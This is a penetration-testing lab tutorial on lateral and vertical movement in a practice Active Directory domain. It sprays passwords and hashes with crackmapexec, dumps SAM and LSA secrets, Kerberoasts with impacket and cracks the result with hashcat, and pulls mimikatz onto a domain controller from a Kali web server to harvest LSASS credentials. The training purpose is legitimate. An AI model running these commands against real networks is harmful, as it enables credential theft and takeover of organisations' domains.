This section covers lateral movement and vertical movement. Vertical movement (privilege escalation) lets a penetration tester gain higher privileges within the network, whereas lateral movement reuses the same level of privilege across multiple systems on the network.


Lateral movement with crackmapexec:

  1. Power on Kali, THEPUNISHER and the Windows Server 2022 machine. We will perform a pass-the-password attack, spraying the password of the user fcastle across the entire domain. Make sure crackmapexec is installed on Kali, then run:
crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1

crackmapexec enumerates SMB on the target range and tries the credential against every host it finds. A host on which the credential has local administrator rights is marked with (Pwn3d!) at the end of its line; a plain [+] line means the logon worked but without admin rights.

  2. Retrieve the SAM database from the Windows machines across the domain where the credential is local admin, using the following command:

crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

The local usernames and their NT (NTLM) hashes have been retrieved from the client machine. These hashes can be used directly, without cracking, in a pass-the-hash (PTH) attack across the network for lateral movement and privilege escalation on other devices.

  3. Perform the pass-the-password attack again, this time with the --local-auth flag and the credentials of a local administrator account. Since this is a local account, the -d flag (which names the domain for domain users/admins) is dropped:

crackmapexec smb 10.11.12.0/24 -u Administrator -p Password1! --local-auth

  4. Perform a PTH attack using the hash of the local Administrator account retrieved by the --sam command above. The -H value is the LM:NT pair as dumped; the LM half aad3b435b51404eeaad3b435b51404ee is the well-known empty LM hash, so only the NT half carries the credential. Adjust the target range to your lab subnet:

crackmapexec smb 172.30.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth  # Pass the hash

  5. Since the fcastle account has local administrator rights on the client machine, we can also try to dump the LSA secrets across the domain devices using the following command:

crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --lsa



Vertical movement using kerberos

Important

For this attack to work, the clock on Kali Linux must be in sync with the targeted domain controller (Kerberos tolerates only a few minutes of skew, 5 by default). Otherwise impacket fails with the message "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)". We fix this at the start of this practical exercise.

  1. Open Kali and install ntpdate using the following command:
sudo apt install ntpsec-ntpdate
  2. Next, synchronize Kali's clock with the targeted domain controller (10.11.12.128 here):
sudo ntpdate 10.11.12.128
  3. Request the Kerberos TGS ticket of every account that has an SPN (Kerberoasting), authenticating to the domain controller with a valid domain user credential:
impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 10.11.12.128 -request


Note

An SPN is a unique identifier for a service instance. SPNs are used in Kerberos authentication to associate a service instance with a service logon account, allowing clients to securely request access to services running on servers.

Save the $krb5tgs$ hash printed by the command into a file (TGS.txt is used below).

  4. Determine the hashcat mode for Kerberos 5 etype 23 TGS-REP hashes. It is 13100, which the hashcat help confirms:

hashcat -h | grep TGS

  5. Crack the hash with mode 13100 against the rockyou wordlist:

hashcat -m 13100 TGS.txt /usr/share/wordlists/rockyou.txt -O

  6. Result: the hash is cracked and the SQLService password is MYpassword123#


Lateral movement using mimikatz:

  1. Open Kali and change to /usr/share/windows-resources/mimikatz/x64. From that directory, start a Python web server on port 8000 (the port the download command below uses); it must be reachable from the domain controller.
  2. Log onto the domain controller as the SQLService account whose TGS hash we cracked, using the username MARVEL\SQLService and the recovered password. Open PowerShell as administrator (Invoke-WebRequest is a PowerShell cmdlet and will not run in cmd) and download the files:
Invoke-WebRequest -uri http://kali_ip:8000/mimikatz.exe -OutFile mimikatz.exe
# Download the rest of the files in the x64 directory the same way, replacing mimikatz.exe with each file name

Alternatively, you can get remote access from Kali itself with xfreerdp (RDP) or evil-winrm (WinRM) using the following commands:

xfreerdp /v:10.11.12.128 /u:SQLService /p:'MYpassword123#' /d:MARVEL.local
# If you only have the NT hash, replace /p:... with /pth:HASH (requires Restricted Admin mode on the target)
# Syntax: evil-winrm -i IP -u Username -H Hash
evil-winrm -i 10.11.12.128 -u SQLService -p 'MYpassword123#'
  3. Run mimikatz.exe either by double-clicking the downloaded file in the Downloads folder or from the same console with .\mimikatz.exe
  4. Check that mimikatz can obtain debug privileges using the following command:
privilege::debug

privilege::debug requests SeDebugPrivilege (mimikatz prints Privilege '20' OK on success), which it needs to read LSASS memory and extract the passwords and hashes.


Grabbing credentials using mimikatz:

  1. Extract all the user accounts and their password hashes by using the following command:
sekurlsa::logonpasswords

Mimikatz lists the logon sessions still held in LSASS memory, i.e. the credential material (NT hashes and, where cached, plaintext passwords) of every account that has logged on to the host since its last reboot.

  2. To extract the LSA data from the memory of the domain controller, including the NT hashes of the domain accounts, use the following command:

lsadump::lsa /patch

  3. With the NT (NTLM) hashes of each user you can move laterally through the network with the PTH technique, or crack them offline with hashcat (mode 1000, NTLM).